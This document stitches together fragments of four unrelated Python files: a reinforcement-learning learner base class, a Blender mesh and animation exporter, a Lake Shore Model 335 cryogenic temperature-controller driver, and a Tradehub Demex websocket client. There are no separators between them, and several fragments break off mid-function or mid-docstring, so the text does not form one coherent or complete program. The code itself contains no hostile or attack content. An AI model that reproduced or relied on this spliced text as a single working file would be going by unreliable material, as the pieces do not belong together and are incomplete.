self._train = self.time_wrapper(self._train, 'train_time') def time_wrapper(self, fn: Callable, name: str): """ Overview: Wrap a function and measure the time it used Arguments: - fn (:obj:`Callable`): function to be time_wrapped - name (:obj:`str`): name to be registered in log_buffer """ def wrapper(*args, **kwargs) -> Any: with self._wrapper_timer: ret = fn(*args, **kwargs) self._log_buffer[name] = self._wrapper_timer.value return ret return wrapper def _setup_dataloader(self) -> None: """ Overview: Setup learner's dataloader, data_source need to be a generator, and setup learner's collate_fn, which aggregate a listed data into a batch tensor. """ cfg = self._cfg.learner.data # when single machine version, get_data is set by SingleMachineRunner # when distributed version, get_data is set by comm LearnerCommHelper # users don't need to know the related details if not necessary #self._dataloader = AsyncDataLoader( # self.get_data, cfg.batch_size, self._device, cfg.chunk_size, self._collate_fn, cfg.num_workers, max_reuse=cfg.max_reuse #) self._dataloader = AsyncDataLoader( data_source=self.get_data, batch_size=cfg.batch_size, device=self._device, learner_uid=self._learner_uid, url_prefix='http://{}:{}/'.format(self._cfg.system.coordinator_ip, self._cfg.system.coordinator_port), path_traj=self._cfg.common.path_traj, collate_fn=self._collate_fn, num_workers=cfg.num_workers, use_async=cfg.get('use_async',True), use_async_cuda=cfg.get('use_async_cuda',True), max_reuse=cfg.max_reuse, decompress_type=cfg.get('decompress_type','none') ) def _get_iter_data(self) -> Any: return next(self._dataloader) @abstractmethod def _setup_agent(self) -> None: """ Overview: Setup learner's runtime agent, agent is the subclass instance of `BaseAgent`. There may be more than one agent. Note: `agent` is the wrapped `model`, it can be wrapped with different plugins to satisfy different runtime usages (e.g. actor and learner would use the model differently) """ raise NotImplementedError @abstractmethod def _setup_computation_graph(self) -> None: """ Overview: Setup computation_graph, which uses procssed data and agent to get an optimization computation graph. """ raise NotImplementedError def _setup_optimizer(self) -> None: """ Overview: Setup learner's optimizer and lr_scheduler """ self._optimizer = torch.optim.Adam( self._agent.model.parameters(), lr=self._cfg.learner.learning_rate, weight_decay=self._cfg.learner.weight_decay ) self._lr_scheduler = torch.optim.lr_scheduler.MultiStepLR(self._optimizer, milestones=[], gamma=1) def _train(self, data: Any) -> None: """ Overview: Train the input data for 1 iteration, called in ``run`` which involves: - forward - backward - sync grad (if in distributed mode) - parameter update Arguments: - data (:obj:`Any`): data used for training """ with self._timer: log_vars = self._computation_graph.forward(data, self._agent) loss = log_vars['total_loss'] self._log_buffer['forward_time'] = self._timer.value with self._timer: self._optimizer.zero_grad() loss.backward() if self._use_distributed: self._agent.model.sync_gradients() self._optimizer.step() grad = self._optimizer.get_grad() self._log_buffer['backward_time'] = self._timer.value self._log_buffer['grad'] = grad self._log_buffer.update(log_vars) def register_stats(self) -> None: """ Overview: register some basic attributes to record & tb_logger(e.g.: cur_lr, data_time, train_time), register the attributes related to computation_graph to record & tb_logger. """ self._record.register_var('cur_lr') self._record.register_var('data_time') self._record.register_var('train_time') self._record.register_var('forward_time') self._record.register_var('backward_time') self._tb_logger.register_var('cur_lr') self._tb_logger.register_var('data_time') self._tb_logger.register_var('train_time') self._tb_logger.register_var('forward_time') self._tb_logger.register_var('backward_time') self._computation_graph.register_stats(self._record, self._tb_logger) def register_hook(self, hook: LearnerHook) -> None: """ Overview: Add a new hook to learner. Arguments: - hook (:obj:`LearnerHook`): the hook to be added to learner """ add_learner_hook(self._hooks, hook) @auto_checkpoint def run(self, max_iterations: Union[int, None] = None) -> None: """ Overview: Run the learner. For each iteration, learner will get training data and train. Learner will call hooks at four fixed positions(before_run, before_iter, after_iter, after_run). Arguments: - max_iterations (:obj:`int`): the max run iteration, if None then set to default_max_iterations """ if max_iterations is None: max_iterations = self._default_max_iterations # before run hook self.call_hook('before_run') for _ in range(max_iterations): data = self._get_iter_data() # before iter hook self.call_hook('before_iter') self._train(data) # after iter hook self.call_hook('after_iter') self._last_iter.add(1) # after run hook self.call_hook('after_run') def close(self) -> None: """ Overview: Close the related resources, such as dist_finalize when use_distributed """ if self._use_distributed: dist_finalize() def call_hook(self, name: str) -> None: """ Overview: Call the corresponding hook plugins according to name Arguments: - name (:obj:`str`): hooks in which position to call, \ should be in ['before_run', 'after_run', 'before_iter', 'after_iter'] """ for hook in self._hooks[name]: hook(self) def info(self, s: str) -> None: """ Overview: Log string info by ``self._logger.info`` Arguments: - s (:obj:`str`): the message to add into the logger """ self._logger.info(s) def save_checkpoint(self) -> None: """ Overview: Automatically save checkpoints. Directly call ``save_ckpt_after_run`` hook instead of calling ``call_hook`` function. Note: This method is called by `auto_checkpoint` function in `checkpoint_helper.py`, designed for saving checkpoint whenever an exception raises. """ names = [h.name for h in self._hooks['after_run']] assert 'save_ckpt_after_run' in names idx = names.index('save_ckpt_after_run') self._hooks['after_run'][idx](self) @property def last_iter(self) -> CountVar: return self._last_iter @property def optimizer(self) -> torch.optim.Optimizer: return self._optimizer @property def lr_scheduler(self) -> torch.optim.lr_scheduler._LRScheduler: return self._lr_scheduler @property def computation_graph(self) -> Any: return self._computation_graph @property def agent(self) -> 'BaseAgent': # noqa return self._agent @property def log_buffer(self) -> dict: # LogDict return self._log_buffer @log_buffer.setter def log_buffer(self, _log_buffer: dict) -> None: self._log_buffer = _log_buffer @property def record(self) -> 'VariableRecord': # noqa return self._record @property def load_path(self) -> str: return self._load_path @load_path.setter def load_path(self, _load_path: str) -> None: self._load_path = _load_path @property def save_path(self) -> str: return self._save_path @property def checkpoint_manager(self) -> Any: return self._checkpointer_manager @property def name(self) -> str: return self._name + str(id(self)) @property def rank(self) -> int: return self._rank @property def tb_logger(self) -> 'TensorBoardLogger': # noqa return self._tb_logger @property def use_distributed(self) -> bool: return self._use_distributed learner_mapping = {} def register_learner(name: str, learner: type) -> None: """ Overview: Add a new Learner class with its name to dict learner_mapping, any subclass derived from BaseLearner must use this function to register in ctools system before instantiate. Arguments: - name (:obj:`str`): name of the new Learner - learner (:obj:`type`): the new Learner class, should be subclass of BaseLearner """ assert isinstance(name, str) assert issubclass(learner, BaseLearner) learner_mapping[name] = learner def create_learner(cfg: EasyDict) -> BaseLearner: """ Overview: Given the key(learner_type/name), create a new learner instance if in learner_mapping's values, or raise an KeyError. In other words, a derived learner must first register then
""" TODO: Vertex Color Tangent Space V Flip Normalize Bone Weights Specify Axis Change """ import bpy import struct from enum import Enum class VertexAttributeUsage(Enum): POSITION = 0 TEXTURE_COORDINATE = 1 NORMAL = 2 COLOR = 3 BINORMAL = 4 TANGENT = 5 BONE_WEIGHTS = 6 BONE_INDICES = 7 CUSTOM = 8 class VertexElementFlags(Enum): NONE = 0x00 FLOAT = 0x01 UNSIGNED = 0x02 NORMALIZED = 0x04 class VertexElement: def __init__(self, componentSize = 4, componentCount = 3, usage = VertexAttributeUsage.POSITION, index = 0, flags = VertexElementFlags.FLOAT, offset = 0): # Fill all vertex element data self.offset = offset self.componentSize = componentSize self.componentCount = componentCount self.usage = usage self.index = index self.flags = flags class MeshExportSettings: def __init__(self): self.exportNormals = False self.exportTextures = False self.exportTangentSpace = False self.exportVFlipped = False self.exportBoneWeights = False self.exportBinary = True def getVertexElementsAndSize(mesh, settings): # Find all the vertex elements in the mesh (position if always a given) vertexElements = [VertexElement(4, 3, VertexAttributeUsage.POSITION, 0, VertexElementFlags.FLOAT, 0)] # Exporting normals is an option if settings.exportNormals: vertexElements.append(VertexElement(4, 3, VertexAttributeUsage.NORMAL, 0, VertexElementFlags.FLOAT, 0)) # Export textures if they exist and are desired if settings.exportTextures: for i, uvl in enumerate(mesh.uv_layers): vertexElements.append(VertexElement(4, 2, VertexAttributeUsage.TEXTURE_COORDINATE, i, VertexElementFlags.FLOAT, 0)) # Export tangent space for the first texture if settings.exportTangentSpace and (len(mesh.uv_layers) > 0): vertexElements.append(VertexElement(4, 3, VertexAttributeUsage.TANGENT, 0, VertexElementFlags.FLOAT, 0)) vertexElements.append(VertexElement(4, 3, VertexAttributeUsage.BINORMAL, 0, VertexElementFlags.FLOAT, 0)) # Export animation information (bone weights and indices) if settings.exportBoneWeights: vertexElements.append(VertexElement(4, 4, VertexAttributeUsage.BONE_WEIGHTS, 0, VertexElementFlags.FLOAT, 0)) vertexElements.append(VertexElement(2, 4, VertexAttributeUsage.BONE_INDICES, 0, VertexElementFlags.UNSIGNED, 0)) # Calculate vertex struct size and place offsets vertexSize = 0 for element in vertexElements: element.offset = vertexSize vertexSize += element.componentSize * element.componentCount return (vertexElements, vertexSize) def getVertexIndex(map, elementInds): key = tuple(elementInds) if key in map: return map[key] else: idx = len(map) map[key] = idx return idx def getUnique(map, key): if key in map: return map[key] else: idx = len(map) map[key] = idx return idx def getTris(loops): inds = [loops[0], loops[1], loops[2]] yield tuple(inds) i = 3 while i < len(loops): inds[1] = inds[2] inds[2] = loops[i] i += 1 yield tuple(inds) def insertWeighting(l, w): for i, w2 in enumerate(l): if w[1] > w2[1]: return l[:i] + [w] + l[i:3] return l def getAllUniqueVertexIndices(context, mesh, ne, settings): def vec2key(v): return (round(v[0], 4), round(v[1], 4)) # Return data vd = {} uvDicts = [{} for uvl in mesh.uv_layers] if settings.exportTextures else [] animL = [[(0,0.0), (0,0.0), (0,0.0), (0,0.0)] for vertex in mesh.vertices] if settings.exportBoneWeights else [] tris = [] # Used as a key for vertex information index = [0] * ne # Loop through all the triangles ti = 0 for polyIndex, poly in enumerate(mesh.polygons): for tri in getTris(poly.loop_indices): # Loop through triangle vertices inds = [0, 0, 0] for vti, vert in enumerate(tri): vi = mesh.loops[vert].vertex_index ii = 0 # Position index index[ii] = vi ii += 1 # Normal index if settings.exportNormals: normIndex = vi if poly.use_smooth else -(polyIndex + 1) index[ii] = normIndex ii += 1 # UV index if settings.exportTextures: for i, uvl in enumerate(mesh.uv_layers): uvk = vec2key(uvl.data[vert].uv) index[ii] = getUnique(uvDicts[i], uvk) ii += 1 # Export tangent space for the first texture if settings.exportTangentSpace and (len(mesh.uv_layers) > 0): index[ii] = ti # TODO: Fix this ii += 1 # Animation index if settings.exportBoneWeights: # Bone information is unique to the vertex index[ii] = vi ii += 1 index[ii] = vi ii += 1 inds[vti] = getVertexIndex(vd, index) # Add a triangle tris.append(tuple(inds)) ti += 1 # Compute bone weight information here if settings.exportBoneWeights: object = context.object armature = [obj for obj in context.selected_objects if obj != object][0] for vertex in mesh.vertices: for group in vertex.groups: if group.weight > 0: weight = object.vertex_groups[group.group].weight(vertex.index) * group.weight boneIndex = [i for i, bone in enumerate(armature.data.bones) if bone.name == object.vertex_groups[group.group].name][0] print('%s - %d' % (object.vertex_groups[group.group].name, boneIndex)) animL[vertex.index] = insertWeighting(animL[vertex.index], (boneIndex, weight)) # Normalize weights normFactor = animL[vertex.index][0][1] + animL[vertex.index][1][1] + animL[vertex.index][2][1] + animL[vertex.index][3][1] for i in [0,1,2,3]: animL[vertex.index][i] = (animL[vertex.index][i][0], animL[vertex.index][i][1] / normFactor) # Convert to list form vl = [None] * len(vd) uvl = [[None] * len(uvd) for uvd in uvDicts] for key, val in vd.items(): vl[val] = key for i, uvd in enumerate(uvDicts): for key, val in uvd.items(): uvl[i][val] = key return (vl, uvl, animL, tris) def writeMesh(context, filepath, settings): # Grab mesh for export mesh = context.object.data # Get vertex element information vertexElements, vertexSize = getVertexElementsAndSize(mesh, settings) numElements = len(vertexElements) # Get mesh data vList, uvLists, animL, tris = getAllUniqueVertexIndices(context, mesh, len(vertexElements), settings) if settings.exportBinary: # Open the file in binary mode f = open(filepath, 'wb') # Write header f.write(struct.pack('<4s', bytes('VRAW','utf-8'))) # Write vertex elements f.write(struct.pack('<I', len(vertexElements))) for element in vertexElements: f.write(struct.pack('<HBBBB', element.offset, element.componentSize, element.componentCount, (element.index << 4) | element.usage.value, element.flags.value )) # Write index size f.write(struct.pack('<I', 4)) # Write vertex data f.write(struct.pack('<I', len(vList))) for vertKey in vList: for i, ve in enumerate(vertexElements): if ve.usage == VertexAttributeUsage.POSITION: pos = mesh.vertices[vertKey[i]].co f.write(struct.pack('<fff', pos[0], pos[1], pos[2])) elif ve.usage == VertexAttributeUsage.NORMAL: ni = vertKey[i] normal = mesh.vertices[ni].normal if ni >= 0 else mesh.polygons[-ni - 1].normal f.write(struct.pack('<fff', normal[0], normal[1], normal[2])) elif ve.usage == VertexAttributeUsage.TEXTURE_COORDINATE: uv = uvLists[ve.index][vertKey[i]] f.write(struct.pack('<ff', uv[0], uv[1])) elif ve.usage == VertexAttributeUsage.BONE_WEIGHTS: weights = animL[vertKey[i]] f.write(struct.pack('<ffff', weights[0][1], weights[1][1], weights[2][1], weights[3][1])) elif ve.usage == VertexAttributeUsage.BONE_INDICES: weights = animL[vertKey[i]] f.write(struct.pack('<HHHH', weights[0][0], weights[1][0], weights[2][0], weights[3][0])) # Write index data f.write(struct.pack('<I', len(tris) * 3)) for tri in tris: f.write(struct.pack('<III', tri[0], tri[1], tri[2])) # Close file f.close() else: # Open the file in text mode with added YAML extension f = open(filepath + '.yml', 'w', encoding='utf-8') # Write vertex elements f.write("VertexElements:\n") for element in vertexElements: f.write(' - Offset: %d\n' % (element.offset)) f.write(' CompSize: %d\n' % (element.componentSize)) f.write(' CompCount: %d\n' % (element.componentCount)) f.write(' UsageType: %s\n' % (element.usage.name)) f.write(' UsageIndex: %d\n' % (element.index)) f.write(' Flags: %d\n' % (element.flags.value)) # Write vertex data f.write("Vertices:\n") for vertKey in vList: for i, ve in enumerate(vertexElements): f.write(' - ' if i == 0 else ' ') if ve.usage == VertexAttributeUsage.POSITION: pos = mesh.vertices[vertKey[i]].co f.write('Position%d: [%f,%f,%f]\n' % (ve.index, pos[0], pos[1], pos[2])) elif ve.usage == VertexAttributeUsage.NORMAL: ni = vertKey[i] normal = mesh.vertices[ni].normal if ni >= 0 else mesh.polygons[-ni - 1].normal f.write('Normal%d: [%f,%f,%f]\n' % (ve.index, normal[0], normal[1], normal[2])) elif ve.usage == VertexAttributeUsage.TEXTURE_COORDINATE: uv = uvLists[ve.index][vertKey[i]] f.write('TexCoord%d: [%f,%f]\n' % (ve.index, uv[0], uv[1])) elif ve.usage == VertexAttributeUsage.BONE_WEIGHTS: weights = animL[vertKey[i]] f.write('BWeights%d: [%f,%f,%f,%f]\n' % (ve.index, weights[0][1], weights[1][1], weights[2][1], weights[3][1])) elif ve.usage == VertexAttributeUsage.BONE_INDICES: weights = animL[vertKey[i]] f.write('BIndices%d: [%d,%d,%d,%d]\n' % (ve.index, weights[0][0], weights[1][0], weights[2][0], weights[3][0])) # Write index data f.write("Triangles:\n") for tri in tris: f.write(' - [%d,%d,%d]\n' % (tri[0], tri[1], tri[2])) # Close file f.close() return {'FINISHED'} def getKeyframes(context, object): # Deselect all bones for bone in object.data.bones: bone.select = False keyframes = [[] for bone in object.data.bones] for i, bone in enumerate(object.data.bones): bone.select = True bpy.ops.screen.frame_jump(0) context.scene.update() context.scene.frame_set(context.scene.frame_current) keyframes[i].append(context.scene.frame_current) while {'FINISHED'} == bpy.ops.screen.keyframe_jump(): context.scene.update() context.scene.frame_set(context.scene.frame_current) keyframes[i].append(context.scene.frame_current) bone.select = False return keyframes def writeSkeleton(context, filepath, exportBinary): # Get the armature object = bpy.context.object # TODO: Make sure we're not in POSE mode if object.mode != 'POSE': bpy.ops.object.posemode_toggle() # Obtain the keyframes keyframes = getKeyframes(context, object) if exportBinary: # Open the file in binary mode f = open(filepath, 'wb') # Write header f.write(b'ANIM') # Write all the bones f.write(struct.pack('<I', len(object.pose.bones))) for boneIndex, bone in enumerate(object.pose.bones): # Write bone name and parent f.write(struct.pack('<I', len(bone.name))) f.write(bytes(bone.name, 'ASCII')) if bone.parent: f.write(struct.pack('<I', len(bone.parent.name))) f.write(bytes(bone.parent.name, 'ASCII')) else: f.write(struct.pack('<I', 0)) # Write bone rest pose object.data.pose_position = 'REST' context.scene.update() rotation = bone.matrix.to_quaternion() f.write(struct.pack('<ffff', rotation[1], rotation[2], rotation[3], rotation[0])) matrix = bone.matrix f.write(struct.pack('<fff', matrix[0][3], matrix[1][3], matrix[2][3])) object.data.pose_position = 'POSE' context.scene.update() # Write all keyframes for the bone f.write(struct.pack('<I', len(keyframes[boneIndex]))) for frame in keyframes[boneIndex]: # Move to animation frame bpy.context.scene.frame_set(frame) bpy.context.scene.update() # Write frame and pose matrix f.write(struct.pack('<i', frame)) rotation = bone.matrix.to_quaternion() f.write(struct.pack('<ffff', rotation[1], rotation[2], rotation[3], rotation[0]))
"""Implements functionality unique to the Lake Shore Model 335 cryogenic temperature controller""" from enum import IntEnum from .temperature_controllers import TemperatureController, InstrumentException from .temperature_controllers import RelayControlMode, RelayControlAlarm, InterfaceMode, HeaterError, \ CurveFormat, CurveTemperatureCoefficient, BrightnessLevel, AutotuneMode, HeaterResistance, Polarity, \ DiodeCurrent, HeaterOutputUnits, InputSensorUnits, ControlTypes, StandardEventRegister, OperationEvent, RegisterBase Model335RelayControlMode = RelayControlMode Model335RelayControlAlarm = RelayControlAlarm Model335InterfaceMode = InterfaceMode Model335HeaterError = HeaterError Model335CurveFormat = CurveFormat Model335CurveTemperatureCoefficient = CurveTemperatureCoefficient Model335BrightnessLevel = BrightnessLevel Model335AutoTuneMode = AutotuneMode Model335HeaterResistance = HeaterResistance Model335Polarity = Polarity Model335DiodeCurrent = DiodeCurrent Model335HeaterOutputUnits = HeaterOutputUnits Model335InputSensorUnits = InputSensorUnits Model335ControlTypes = ControlTypes Model335StandardEventRegister = StandardEventRegister Model335OperationEvent = OperationEvent class Model335InputSensor(IntEnum): """Enumeration when "NONE" is an option for sensor input""" NONE = 0 CHANNEL_A = 1 CHANNEL_B = 2 class Model335MonitorOutUnits(IntEnum): """Units associated with a sensor channel""" KELVIN = 1 CELSIUS = 2 SENSOR = 3 class Model335InputSensorType(IntEnum): """Sensor type enumeration""" DISABLED = 0 DIODE = 1 PLATINUM_RTD = 2 NTC_RTD = 3 THERMOCOUPLE = 4 class Model335DiodeRange(IntEnum): """Diode voltage range enumeration""" TWO_POINT_FIVE_VOLTS = 0 TEN_VOLTS = 1 class Model335RTDRange(IntEnum): """RTD resistance range enumeration""" TEN_OHM = 0 THIRTY_OHM = 1 HUNDRED_OHM = 2 THREE_HUNDRED_OHM = 3 ONE_THOUSAND_OHM = 4 THREE_THOUSAND_OHM = 5 TEN_THOUSAND_OHM = 6 THIRTY_THOUSAND_OHM = 7 ONE_HUNDRED_THOUSAND_OHM = 8 class Model335ThermocoupleRange(IntEnum): """Thermocouple range enumeration""" FIFTY_MILLIVOLT = 0 class Model335InputSensorSettings: """Class object used in the get/set_input_sensor methods""" def __init__(self, sensor_type, autorange_enable, compensation, units, input_range=None): """Constructor for the InputSensor class Args: sensor_type (Model335InputSensorType): * Specifies input sensor type autorange_enable (bool): * Specifies autoranging * False = off and True = on compensation (bool): * Specifies input compensation * False = off and True = on units (Model335InputSensorUnits): * Specifies the preferred units parameter for sensor readings and for the control setpoint input_range (IntEnum) * Specifies input range if autorange_enable is false * See IntEnum classes: * Model335DiodeRange * Model335RTDRange * Model335ThermocoupleRange """ self.sensor_type = sensor_type self.autorange_enable = autorange_enable self.compensation = compensation self.units = units self.input_range = input_range class Model335HeaterOutType(IntEnum): """Heater output 2 enumeration""" CURRENT = 0 VOLTAGE = 1 class Model335HeaterOutputDisplay(IntEnum): """Heater output display units enumeration""" CURRENT = 1 POWER = 2 class Model335HeaterOutputMode(IntEnum): """Control loop enumeration""" OFF = 0 CLOSED_LOOP = 1 ZONE = 2 OPEN_LOOP = 3 MONITOR_OUT = 4 WARMUP_SUPPLY = 5 class Model335WarmupControl(IntEnum): """Heater output 2 voltage mode warmup enumerations""" AUTO_OFF = 0 CONTINUOUS = 1 class Model335HeaterRange(IntEnum): """Control loop heater range enumeration""" OFF = 0 LOW = 1 MEDIUM = 2 HIGH = 3 class Model335ControlLoopZoneSettings: """Control loop configuration for a particular heater output and zone""" def __init__(self, upper_bound, proportional, integral, derivative, manual_output_value, heater_range, channel, ramp_rate): """Constructor Args: upper_bound (float): * Specifies the upper Setpoint boundary of this zone in kelvin proportional (float): * Specifies the proportional gain for this zone * 0.1 to 1000 integral (float): * Specifies the integral gain for this zone * 0.1 to 1000 derivative (float): * Specifies the derivative gain for this zone * 0 to 200 % manual_output_value (float): * Specifies the manual output for this zone * 0 to 100 % heater_range (Model335HeaterRange): * Specifies the heater range for this zone * See Model335HeaterRange IntEnum class channel (Model335InputSensor): * See Model335InputSensor IntEnum class ramp_rate (float): * Specifies the ramp rate for this zone * 0 - 100 K/min """ self.upper_bound = upper_bound self.proportional = proportional self.integral = integral self.derivative = derivative self.manual_output_value = manual_output_value self.heater_range = heater_range self.channel = channel self.ramp_rate = ramp_rate class Model335DisplaySetup(IntEnum): """Panel display setup enumeration""" INPUT_A = 0 INPUT_A_MAX_MIN = 1 TWO_INPUT_A = 2 INPUT_B = 3 INPUT_B_MAX_MIN = 4 TWO_INPUT_B = 5 CUSTOM = 6 TWO_LOOP = 7 class Model335HeaterVoltageRange(IntEnum): """Voltage mode heater enumerations""" VOLTAGE_OFF = 0 VOLTAGE_ON = 1 class Model335DisplayInputChannel(IntEnum): """Panel display information enumeration""" NONE = 0 INPUT_A = 1 INPUT_B = 2 SETPOINT_1 = 3 SETPOINT_2 = 4 OUTPUT_1 = 5 OUTPUT_2 = 6 class Model335DisplayFieldUnits(IntEnum): """Panel display units enumeration""" KELVIN = 1 CELSIUS = 2 SENSOR_UNITS = 3 MINIMUM_DATA = 4 MAXIMUM_DATA = 5 SENSOR_NAME = 6 class Model335StatusByteRegister(RegisterBase): """Class object representing the status byte register LSB to MSB""" bit_names = [ "", "", "", "", "message_available_summary_bit", "event_status_summary_bit", "service_request", "operation_summary_bit" ] def __init__(self, message_available_summary_bit, event_status_summary_bit, service_request, operation_summary_bit): self.message_available_summary_bit = message_available_summary_bit self.event_status_summary_bit = event_status_summary_bit self.service_request = service_request self.operation_summary_bit = operation_summary_bit class Model335ServiceRequestEnable(RegisterBase): """Class object representing the service request enable register LSB to MSB""" bit_names = [ "", "", "", "", "message_available_summary_bit", "event_status_summary_bit", "", "operation_summary_bit" ] def __init__(self, message_available_summary_bit, event_status_summary_bit, operation_summary_bit): self.message_available_summary_bit = message_available_summary_bit self.event_status_summary_bit = event_status_summary_bit self.operation_summary_bit = operation_summary_bit class Model335InputReadingStatus(RegisterBase): """Class object representing the input status flag bits""" bit_names = [ "invalid_reading", "", "", "", "temp_underrange", "temp_overrange", "sensor_units_zero", "sensor_units_overrange" ] def __init__(self, invalid_reading, temp_underrange, temp_overrange, sensor_units_zero, sensor_units_overrange): self.invalid_reading = invalid_reading self.temp_underrange = temp_underrange self.temp_overrange = temp_overrange self.sensor_units_zero = sensor_units_zero self.sensor_units_overrange = sensor_units_overrange class Model335(TemperatureController): """A class object representing the Lake Shore Model 335 cryogenic temperature controller""" # Initiate enum types for temperature controllers _input_channel_enum = Model335DisplayInputChannel _display_units_enum = Model335DisplayFieldUnits # Initiate instrument specific registers _status_byte_register = Model335StatusByteRegister _service_request_enable = Model335ServiceRequestEnable vid_pid = [(0x1FB9, 0x0300)] def __init__(self, baud_rate, serial_number=None, com_port=None, timeout=2.0, ip_address=None, tcp_port=None, **kwargs): # Call the parent init, then fill in values specific to the 335 TemperatureController.__init__(self, serial_number, com_port, baud_rate, timeout, ip_address, tcp_port, **kwargs) # Disable emulation mode self._disable_emulation() # Alias specific temperature controller methods get_analog_output_percentage = TemperatureController._get_analog_output_percentage set_autotune = TemperatureController._set_autotune set_brightness = TemperatureController._set_brightness get_brightness = TemperatureController._get_brightness get_operation_condition = TemperatureController._get_operation_condition get_operation_event_enable = TemperatureController._get_operation_event_enable set_operation_event_enable = TemperatureController._set_operation_event_enable get_operation_event = TemperatureController._get_operation_event get_thermocouple_junction_temp = TemperatureController._get_thermocouple_junction_temp set_soft_cal_curve_dt_470 = TemperatureController._set_soft_cal_curve_dt_470 set_soft_cal_curve_pt_100 = TemperatureController._set_soft_cal_curve_pt_100 set_soft_cal_curve_pt_1000 = TemperatureController._set_soft_cal_curve_pt_1000 set_diode_excitation_current = TemperatureController._set_diode_excitation_current get_diode_excitation_current = TemperatureController._get_diode_excitation_current get_tuning_control_status = TemperatureController._get_tuning_control_status set_filter = TemperatureController._set_filter get_filter = TemperatureController._get_filter def set_monitor_output_heater(self, channel, high_value, low_value, units=Model335MonitorOutUnits.KELVIN, polarity=Model335Polarity.UNIPOLAR): """Configures output 2. Use the set_heater_output_mode command to set the output mode to Monitor Out. Args: channel (Model335InputSensor): * Specifies which sensor input to monitor high_value (float): * Represents the data at which the Monitor Out reaches +100% output * Entered in the units designated by the <units> argument low_value (float): * Represents the data at which the analog output reaches -100% output if bipolar, * or 0% outputif unipolar. Entered in the units designated by the <units> argument units (Model335MonitorOutUnits): * Specifies the units on which to base the output voltage polarity (Model335Polarity): * Specifies output voltage is unipolar or bipolar """ self.command("ANALOG 2,{},{},{},{},{}".format(channel, units, high_value, low_value, polarity)) def get_monitor_output_heater(self): """Used to obtain all monitor out parameters for output 2. Return: (dict): * See set_monitor_output_heater method arguments * Keys: * "channel": Model335InputSensor * "units": Model335MonitorOutUnits * "high_value": float * "low_value": float * "polarity": Model335Polarity """ parameters = self.query("ANALOG? 2").split(",") return {"channel": Model335InputSensor(int(parameters[0])), "units": Model335MonitorOutUnits(int(parameters[1])), "high_value": float(parameters[2]), "low_value": float(parameters[3]), "polarity": Model335Polarity(int(parameters[4]))} def get_celsius_reading(self, channel): """Returns the temperature value in celsius of either channel. Args: channel (str): * Selects the sensor input to query * "A" or "B" """ return float(self.query("CRDG? {}".format(channel))) def set_display_setup(self, mode): """Sets the display mode Args: mode (Model335DisplaySetup): * Specifies the front panel display mode * See Model335DisplaySetup IntEnum class """ self.command("DISPLAY {}".format(mode)) def get_display_setup(self): """Returns the display mode Return: (Model335DisplaySetup): * Specifies the front panel display mode * See Model335DisplaySetup IntEnum class """ return Model335DisplaySetup(int(self.query("DISPLAY?"))) def set_heater_setup_one(self, heater_resistance, max_current, output_display_mode): """Method to configure heater output one. Args: heater_resistance (Model335HeaterResistance): * See Model335HeaterResistance IntEnum class max_current (float): * Specifies the maximum current for the heater output_display_mode (Model335HeaterOutputDisplay): * Specifies how the heater output is displayed * See Model335HeaterOutType IntEnum class """ self.command("HTRSET 1,0,{},0,{},{}".format(heater_resistance, max_current, output_display_mode)) def set_heater_setup_two(self, output_type, heater_resistance, max_current, display_mode): """Method to configure the heater output 2. Args: output_type (Model335HeaterOutType): * Specifies wheter the heater output is in constant current or voltage mode * See Model335HeaterOutType IntEnum class heater_resistance (Model335HeaterResistance): * See Model335HeaterResistance IntEnum class max_current (float): * Specifies the maximum current for the heater display_mode (Model335HeaterOutType): * Specifies how the heater output is displayed * Required only if output_type is set to CURRENT * See Model335HeaterOutType IntEnum class """ self.command("HTRSET 2,{},{},0,{},{}".format(output_type, heater_resistance, max_current, display_mode)) def get_heater_setup(self, heater_output): """Returns the heater configuration status. Args: heater_output (int) * Selects which heater output to query Return: (dict): * See set_heater_setup_one/set_heater_setup_two method arguments * Keys: * "output_type": Model335HeaterOutType * "heater_resistance": Model335HeaterResistance * "max_current": float * "output_display_mode": Model335HeaterOutputDisplay """ heater_setup = self.query("HTRSET? {}".format(heater_output)).split(",")
<reponame>Mai-Te-Pora/tradehub-python from typing import Optional, List, Callable import websockets import json class DemexWebsocket: """ DemexWebsocket is a high-level async implementation off the official Tradehub Demex websocket and provides all functionalities described in the documentation. """ def __init__(self, uri: str, ping_interval: Optional[int] = 10, ping_timeout: Optional[int] = 30): """ Create a websocket which is complaint with the specification provided by the offical documentation. .. see:: https://docs.switcheo.org/#/?id=websocket :param uri: Websocket URI, starting with 'ws://' or 'wss://' e.g. 'ws://192.168.127.12:5000/ws' :param ping_interval: Interval for pinging the server in seconds. :param ping_timeout: Time after no response for pings are considered as timeout in seconds. """ self._uri: str = uri self._ping_interval: int = ping_interval self._ping_timeout: int = ping_timeout self._websocket: Optional[websockets.WebSocketClientProtocol] = None async def subscribe(self, message_id: str, channels: List[str]): """ Subscribe to one or many channels. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param channels: List with channels to join. :return: None """ await self.send({ "id": message_id, "method": "subscribe", "params": {"channels": channels} }) async def unsubscribe(self, message_id: str, channels: List[str]): """ Unsubscribe to one or many channels. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param channels: List with channels to leave. :return: None """ await self.send({ "id": message_id, "method": "unsubscribe", "params": {"channels": channels} }) async def subscribe_leverages(self, message_id: str, swth_address: str): """ Subscribe to wallet specific leverages channel. .. warning:: This channel has not been tested yet. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet. :return: None """ # TODO not tested yet channel_name: str = f"leverages.{swth_address}" await self.subscribe(message_id, [channel_name]) async def subscribe_market_stats(self, message_id: str): """ Subscribe to market stats. Example:: ws_client.subscribe_market_stats('market_stats') The initial channel message is expected as:: { 'id':'market_stats', 'result': ['market_stats'] } The subscription and channel messages are expected as follow:: { 'channel': 'market_stats', 'sequence_number': 484, 'result': { 'cel1_usdc1': { 'day_high': '5.97', 'day_low': '5.72', 'day_open': '5.86', 'day_close': '5.74', 'day_volume': '414.4', 'day_quote_volume': '2429.009', 'index_price': '0', 'mark_price': '0', 'last_price': '5.74', 'market': 'cel1_usdc1', 'market_type': 'spot', 'open_interest': '0' } ... } } :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :return: None """ channel_name: str = "market_stats" await self.subscribe(message_id, [channel_name]) async def subscribe_books(self, message_id: str, market: str): """ Subscribe to book channel. Example:: ws_client.subscribe_books('orderbook', "swth_eth1') The initial channel message is expected as:: { 'id':'orderbook', 'result': 